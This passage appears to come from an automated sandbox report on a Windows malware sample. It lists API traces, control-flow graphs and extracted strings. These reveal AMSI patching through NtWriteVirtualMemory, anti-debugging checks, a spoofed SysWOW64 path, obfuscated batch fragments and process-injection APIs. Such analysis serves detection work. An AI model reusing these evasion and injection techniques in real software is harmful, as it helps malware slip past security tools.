                  • Part of subcall function 02878798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize), ref: 02878802
                  • Part of subcall function 02878704: LoadLibraryW.KERNEL32(amsi), ref: 0287870D
                  • Part of subcall function 02878704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0287876C
                • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,0288B764), ref: 02884DEB
                  • Part of subcall function 0287DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0287DEA0
                  • Part of subcall function 0287DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287DEF2), ref: 0287DEB6
                  • Part of subcall function 0287DE78: NtDeleteFile.NTDLL(?), ref: 0287DED5
                • MoveFileA.KERNEL32(00000000,00000000), ref: 02884FEB
                • MoveFileA.KERNEL32(00000000,00000000), ref: 02885041
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                • API String ID: 2010126900-181751239
                • Opcode ID: 8b4aa755c9800695fc8c2b85586d3d9452123d3c827d7ca8a8e3f28f9c75e039
                • Instruction ID: 39b4f665dc8aea15bca867b49a3653ad2b255300c52b98bc287992e9367c6cc1
                • Opcode Fuzzy Hash: 8b4aa755c9800695fc8c2b85586d3d9452123d3c827d7ca8a8e3f28f9c75e039
                • Instruction Fuzzy Hash: FF241E3CA501589BDB21FB68DD85AEE73B6BF94314F1080E5E009E7355DE70AE868F12

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5547 2865a78-2865ab9 GetModuleFileNameA RegOpenKeyExA 5548 2865afb-2865b3e call 28658b4 RegQueryValueExA 5547->5548 5549 2865abb-2865ad7 RegOpenKeyExA 5547->5549 5556 2865b62-2865b7c RegCloseKey 5548->5556 5557 2865b40-2865b5c RegQueryValueExA 5548->5557 5549->5548 5550 2865ad9-2865af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2865b84-2865bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2865c9e-2865ca5 5552->5554 5555 2865bbb-2865bbf 5552->5555 5559 2865bc1-2865bc5 5555->5559 5560 2865bcb-2865be1 lstrlenA 5555->5560 5557->5556 5561 2865b5e 5557->5561 5559->5554 5559->5560 5562 2865be4-2865be7 5560->5562 5561->5556 5563 2865bf3-2865bfb 5562->5563 5564 2865be9-2865bf1 5562->5564 5563->5554 5566 2865c01-2865c06 5563->5566 5564->5563 5565 2865be3 5564->5565 5565->5562 5567 2865c30-2865c32 5566->5567 5568 2865c08-2865c2e lstrcpynA LoadLibraryExA 5566->5568 5567->5554 5569 2865c34-2865c38 5567->5569 5568->5567 5569->5554 5570 2865c3a-2865c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5554 5571 2865c6c-2865c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5554
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02860000,0288E790), ref: 02865A94
                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02860000,0288E790), ref: 02865AB2
                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02860000,0288E790), ref: 02865AD0
                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02865AEE
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02865B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02865B37
                • RegQueryValueExA.ADVAPI32(?,02865CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02865B7D,?,80000001), ref: 02865B55
                • RegCloseKey.ADVAPI32(?,02865B84,00000000,?,?,00000000,02865B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02865B77
                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02865B94
                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02865BA1
                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02865BA7
                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02865BD2
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02865C19
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02865C29
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02865C51
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02865C61
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02865C87
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02865C97
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                • API String ID: 1759228003-2375825460
                • Opcode ID: a5ea2609aa057088394321dcddf548b621644350f6734a29511ef27142c14dc2
                • Instruction ID: 9031429d51e684f9c5a4979680c68a442585c3ad55364f5d7b247ef695713338
                • Opcode Fuzzy Hash: a5ea2609aa057088394321dcddf548b621644350f6734a29511ef27142c14dc2
                • Instruction Fuzzy Hash: 0051877DA4024D7EFB21D6A8CC4EFFF77BD9B04744F8001A1A608E6281DB789A448F65

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5647 287f024-287f03e GetModuleHandleW 5648 287f040-287f052 GetProcAddress 5647->5648 5649 287f06a-287f072 5647->5649 5648->5649 5650 287f054-287f064 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 287f066 5650->5651 5651->5649
                APIs
                • GetModuleHandleW.KERNEL32(KernelBase), ref: 0287F034
                • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0287F046
                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0287F05D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                • String ID: CheckRemoteDebuggerPresent$KernelBase
                • API String ID: 35162468-539270669
                • Opcode ID: cfe7ce8d5bba689a5b2acd7e6f7e6df6fa43d9012533e0ab5bdd86cc08b7b9ef
                • Instruction ID: 58d82c5b0f5ccbefcada9cba32a6d4e9c1ef2fdd854d487a9f2419d09a587132
                • Opcode Fuzzy Hash: cfe7ce8d5bba689a5b2acd7e6f7e6df6fa43d9012533e0ab5bdd86cc08b7b9ef
                • Instruction Fuzzy Hash: 6FF0273C904258BADB10B6A988887ECFBB85B36328F2443C0A524E22C1E3754650C661

                Control-flow Graph

                APIs
                  • Part of subcall function 02864ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02864EDA
                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287E0B4), ref: 0287E01F
                • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0287E0B4), ref: 0287E04F
                • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0287E064
                • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0287E090
                • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0287E099
                  • Part of subcall function 02864C0C: SysFreeString.OLEAUT32(0287ED84), ref: 02864C1A
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                • String ID:
                • API String ID: 1897104825-0
                • Opcode ID: 9134bad97f68ca7e606dad2efde79d534afbfba01d85d493a156d4ef7b84f05c
                • Instruction ID: 87aedda085634257d6f787a85ed262fde576cdd571f9ec3a092a7da843833d5a
                • Opcode Fuzzy Hash: 9134bad97f68ca7e606dad2efde79d534afbfba01d85d493a156d4ef7b84f05c
                • Instruction Fuzzy Hash: E321C479A403087AEB11EAD8CC46FEE77BDAB48B14F500461B700F71C0D6B4AA458B56

                Control-flow Graph

                APIs
                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0287E86A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: CheckConnectionInternet
                • String ID: Initialize$OpenSession$ScanBuffer
                • API String ID: 3847983778-3852638603
                • Opcode ID: 5edc9e03163698ac8deb9eb9454e3b8882b7683cb38b09ce1cac54cb4b96acb3
                • Instruction ID: 1311a00ae2e53da267ea12fc6c4848b927045c0f0fe51447ac0a52fd0df257c4
                • Opcode Fuzzy Hash: 5edc9e03163698ac8deb9eb9454e3b8882b7683cb38b09ce1cac54cb4b96acb3
                • Instruction Fuzzy Hash: 67411D3DB501089FEB20EBA8D885AAEB7FAEF48710F214475E401E7351DA74ED058F12

                Control-flow Graph

                APIs
                  • Part of subcall function 02878018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02878088,?,?,00000000,?,028779FE,ntdll,00000000,00000000,02877A43,?,?,00000000), ref: 02878056
                  • Part of subcall function 02878018: GetModuleHandleA.KERNELBASE(?), ref: 0287806A
                  • Part of subcall function 028780C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02878148,?,?,00000000,00000000,?,02878061,00000000,KernelBASE,00000000,00000000,02878088), ref: 0287810D
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02878113
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(?,?), ref: 02878125
                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02877D6C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                • String ID: Ntdll$yromeMlautriVetirW
                • API String ID: 2719805696-3542721025
                • Opcode ID: af14f612acc642bf596cb67e6fc7694c9bf3d3f9ab72a3a471812020cc4b3bdf
                • Instruction ID: c6d651460302c439806822f79a976bc6af0c2b377b5901be2f103fc759ac5c3b
                • Opcode Fuzzy Hash: af14f612acc642bf596cb67e6fc7694c9bf3d3f9ab72a3a471812020cc4b3bdf
                • Instruction Fuzzy Hash: 85014C7D640208AFE710EFA8D845EAEBBEDEB8D710F614860B900D7694C674E914CF62

                Control-flow Graph

                APIs
                  • Part of subcall function 02876CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02876D39,?,?,?,00000000), ref: 02876D19
                • CoCreateInstance.OLE32(?,00000000,00000005,02876E2C,00000000,00000000,02876DAB,?,00000000,02876E1B), ref: 02876D97
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: CreateFromInstanceProg
                • String ID:
                • API String ID: 2151042543-0
                • Opcode ID: 929e45e4e21fdf11c4819c390b54e384af875b2a0042d8dc52cbe2c882ce01e0
                • Instruction ID: c7fde9f11f027678de523e2ebf851efc4b8af595333bc704c17a2c4068295752
                • Opcode Fuzzy Hash: 929e45e4e21fdf11c4819c390b54e384af875b2a0042d8dc52cbe2c882ce01e0
                • Instruction Fuzzy Hash: 2901F27E608B04AEF715DFA8DC2687FBBADE749B10B624835F501D2640F635D900C976

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5572 2861724-2861736 5573 286173c-286174c 5572->5573 5574 2861968-286196d 5572->5574 5575 28617a4-28617ad 5573->5575 5576 286174e-286175b 5573->5576 5577 2861973-2861984 5574->5577 5578 2861a80-2861a83 5574->5578 5575->5576 5581 28617af-28617bb 5575->5581 5584 2861774-2861780 5576->5584 5585 286175d-286176a 5576->5585 5579 2861986-28619a2 5577->5579 5580 2861938-2861945 5577->5580 5582 2861684-28616ad VirtualAlloc 5578->5582 5583 2861a89-2861a8b 5578->5583 5586 28619a4-28619ac 5579->5586 5587 28619b0-28619bf 5579->5587 5580->5579 5591 2861947-286195b Sleep 5580->5591 5581->5576 5588 28617bd-28617c9 5581->5588 5589 28616df-28616e5 5582->5589 5590 28616af-28616dc call 2861644 5582->5590 5594 2861782-2861790 5584->5594 5595 28617f0-28617f9 5584->5595 5592 2861794-28617a1 5585->5592 5593 286176c-2861770 5585->5593 5596 2861a0c-2861a22 5586->5596 5597 28619c1-28619d5 5587->5597 5598 28619d8-28619e0 5587->5598 5588->5576 5599 28617cb-28617de Sleep 5588->5599 5590->5589 5591->5579 5603 286195d-2861964 Sleep 5591->5603 5601 286182c-2861836 5595->5601 5602 28617fb-2861808 5595->5602 5609 2861a24-2861a32 5596->5609 5610 2861a3b-2861a47 5596->5610 5597->5596 5605 28619e2-28619fa 5598->5605 5606 28619fc-28619fe call 28615cc 5598->5606 5599->5576 5604 28617e4-28617eb Sleep 5599->5604 5611 28618a8-28618b4 5601->5611 5612 2861838-2861863 5601->5612 5602->5601 5608 286180a-286181e Sleep 5602->5608 5603->5580 5604->5575 5615 2861a03-2861a0b 5605->5615 5606->5615 5608->5601 5617 2861820-2861827 Sleep 5608->5617 5609->5610 5618 2861a34 5609->5618 5621 2861a68 5610->5621 5622 2861a49-2861a5c 5610->5622 5613 28618b6-28618c8 5611->5613 5614 28618dc-28618eb call 28615cc 5611->5614 5619 2861865-2861873 5612->5619 5620 286187c-286188a 5612->5620 5624 28618cc-28618da 5613->5624 5625 28618ca 5613->5625 5631 28618fd-2861936 5614->5631 5637 28618ed-28618f7 5614->5637 5617->5602 5618->5610 5619->5620 5627 2861875 5619->5627 5628 286188c-28618a6 call 2861500 5620->5628 5629 28618f8 5620->5629 5623 2861a6d-2861a7f 5621->5623 5622->5623 5630 2861a5e-2861a63 call 2861500 5622->5630 5624->5631 5625->5624 5627->5620 5628->5631 5629->5631 5630->5623
                APIs
                • Sleep.KERNEL32(00000000), ref: 028617D0
                • Sleep.KERNEL32(0000000A,00000000), ref: 028617E6
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: f445a5b58dca61d1228e5d6710f5907bc7e216565ce7494b5417c68b5155069b
                • Instruction ID: 2b4e05e76c870f89f3cac74fcea0811ec673b07b7cde7b95be8c7e2f6dec8c15
                • Opcode Fuzzy Hash: f445a5b58dca61d1228e5d6710f5907bc7e216565ce7494b5417c68b5155069b
                • Instruction Fuzzy Hash: 47B1227EA002818BC716CF28E88C376BBE1EB85315F1886AEE54DCB7C6C7709551CB94

                Control-flow Graph

                APIs
                • LoadLibraryW.KERNEL32(amsi), ref: 0287870D
                  • Part of subcall function 028780C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02878148,?,?,00000000,00000000,?,02878061,00000000,KernelBASE,00000000,00000000,02878088), ref: 0287810D
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02878113
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(?,?), ref: 02878125
                  • Part of subcall function 02877CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02877D6C
                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0287876C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                • String ID: DllGetClassObject$W$amsi
                • API String ID: 941070894-2671292670
                • Opcode ID: 71e4ab0c6ccbb76460c9074245e7036b6103af51bbc6a3c056b97b31f5539304
                • Instruction ID: b44ab317dc64805c9280044c5802c9d62827f92e1d6aacc003ade07b5a3074bd
                • Opcode Fuzzy Hash: 71e4ab0c6ccbb76460c9074245e7036b6103af51bbc6a3c056b97b31f5539304
                • Instruction Fuzzy Hash: 36F0C25844C381B9E200E67C8C49F4BBFCD4B92224F048B1CB1E8DA2D2D679D104DBB7

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5652 2861a8c-2861a9b 5653 2861aa1-2861aa5 5652->5653 5654 2861b6c-2861b6f 5652->5654 5657 2861aa7-2861aae 5653->5657 5658 2861b08-2861b11 5653->5658 5655 2861b75-2861b7f 5654->5655 5656 2861c5c-2861c60 5654->5656 5659 2861b81-2861b8d 5655->5659 5660 2861b3c-2861b49 5655->5660 5663 2861c66-2861c6b 5656->5663 5664 28616e8-286170b call 2861644 VirtualFree 5656->5664 5661 2861ab0-2861abb 5657->5661 5662 2861adc-2861ade 5657->5662 5658->5657 5665 2861b13-2861b27 Sleep 5658->5665 5668 2861bc4-2861bd2 5659->5668 5669 2861b8f-2861b92 5659->5669 5660->5659 5667 2861b4b-2861b5f Sleep 5660->5667 5670 2861ac4-2861ad9 5661->5670 5671 2861abd-2861ac2 5661->5671 5672 2861af3 5662->5672 5673 2861ae0-2861af1 5662->5673 5680 2861716 5664->5680 5681 286170d-2861714 5664->5681 5665->5657 5666 2861b2d-2861b38 Sleep 5665->5666 5666->5658 5667->5659 5676 2861b61-2861b68 Sleep 5667->5676 5677 2861b96-2861b9a 5668->5677 5679 2861bd4-2861bd9 call 28614c0 5668->5679 5669->5677 5678 2861af6-2861b03 5672->5678 5673->5672 5673->5678 5676->5660 5682 2861bdc-2861be9 5677->5682 5683 2861b9c-2861ba2 5677->5683 5678->5655 5679->5677 5686 2861719-2861723 5680->5686 5681->5686 5682->5683 5687 2861beb-2861bf2 call 28614c0 5682->5687 5688 2861bf4-2861bfe 5683->5688 5689 2861ba4-2861bc2 call 2861500 5683->5689 5687->5683 5691 2861c00-2861c28 VirtualFree 5688->5691 5692 2861c2c-2861c59 call 2861560 5688->5692
                APIs
                • Sleep.KERNEL32(00000000,?,?,00000000,02861FE4), ref: 02861B17
                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02861FE4), ref: 02861B31
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
